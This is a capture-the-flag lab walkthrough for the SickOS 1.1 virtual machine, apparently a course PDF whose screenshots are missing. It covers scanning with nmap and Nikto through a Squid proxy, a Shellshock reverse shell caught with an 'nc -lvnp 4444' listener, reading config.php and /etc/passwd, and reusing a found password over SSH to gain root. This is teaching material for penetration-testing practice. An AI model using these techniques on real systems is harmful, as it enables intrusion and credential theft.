Lab - Capture The Flag - SickOS 1.1
Lab - Capture The Flag - SickOS 1.1
Overview
In this lab, you will be shown how to gain root access to a virtual machine designed as a
Capture the Flag (CTF) exercise. This CTF is rated as easy. These walk-throughs are designed
so students can learn by emulating the technical guidelines used in conducting an actual real-
world pentest using as few automated tools as possible.
This CTF is similar to the labs found in the OSCP exam course. The objective is to compromise
the target and gain Administrative/root privileges. This CTF will incorporate manual hacking
techniques whenever possible. The use of any automated tools has been kept to an absolute
minimum.
Caveat
VirtualBox was used to run the target machine. Kali Linux is the attacker machine for solving
this CTF.
CTF Description
Difficulty: Easy
DHCP: Enabled
IP Address: Automatically assigned
Footprinting
We begin by conducting an active scan of the network. First, we identify our and then to scan
the target for any open ports or exploitable services.
1
© 2018 syberoffense.com All Rights Reserved
We next need to fingerprint the target to learn what ports and services are available. For this,
we can run Nmap against the target.
The nmap scan shows a Squid HTTP Proxy configured on port 3128 and that HTTP running on
port 8080 is closed. Having HTTP present tells us there is most probably a website presence.
We can configure Nikto with the proxy switch to look for any vulnerabilities on the web server.
Command used: nikto -h 192.168.0.102 -useproxy http://192.168.0.102:3128
2
© 2018 syberoffense.com All Rights Reserved
We the server is vulnerable to the Shellshock vulnerability. Shellshock is a bug that uses a
vulnerability in the common Unix command execution shell bash (Bourne-Again SHell) to
potentially enable hackers to take control of the machine and remotely execute arbitrary code
directly into the system.
To get access to the website, we will need to configure the proxy settings of our Firefox
browser in Kali. Launch Firefox and go to Edit> Preferences>Network Proxy > Settings>.
Once you click OK and save the proxy settings, in the address bar, type in the IP address of the
target and are given the home page for the website.
3
© 2018 syberoffense.com All Rights Reserved
Let’s check the source code for any useful information. Nothing of use here.
From our Nikto scan, we learned of a robots.txt file. Let’s look at that.
Examination of Wolfcms turns of nothing useful. We can now run the exploit Shellshock -
CVE-2014-6271 and CVE-2014-6278 against the site. Doing so will allow us to establish a
reverse shell. Leave the listener up and running.
4
© 2018 syberoffense.com All Rights Reserved
Command used: nc -lvnp 4444
From our Kali machine, we open a second terminal and run the following cURL command
from the following command.
Note: this command is configured with my target and Kali IP information, your IP information
will probably differ.
We used the -x switch to initiate a connection using our HTTP Proxy. We then used the -H
switch to include an edited User-Agent header. The code we executed was a reverse TCP bash
shell.
We next need to change location over to wolfcms folder and then list the contents to see what
we can find.
5
© 2018 syberoffense.com All Rights Reserved
Our target of interest here is the config.php file and its contents. We can view the contents
using the cat command.
We open new terminal and attempt to get access to the SQL database, but the connection does
not happen. We return to the reverse shell and use the cat command to print out the contents of
the etc/passwd file.
6
© 2018 syberoffense.com All Rights Reserved
We see the user sickos. We open a new terminal and attempt to establish a ssh shell using the
user sickos and the password we found earlier, john@123.
Open a second terminal and attempt to login to the target machine using ssh.
7
© 2018 syberoffense.com All Rights Reserved
Let’s access root on the target as sickos.
Let’s list the directory contents and see what permissions that have.
8
© 2018 syberoffense.com All Rights Reserved
Summary –
We captured this flag is short order. This CTF was easy, and it provided us some good insight
into how the OSCP labs are structured.
The biggest take away was learning about the Shellshock vulnerability and how to exploit it.
Methodology Used:
Regards –
Prof. k
9
© 2018 syberoffense.com All Rights Reserved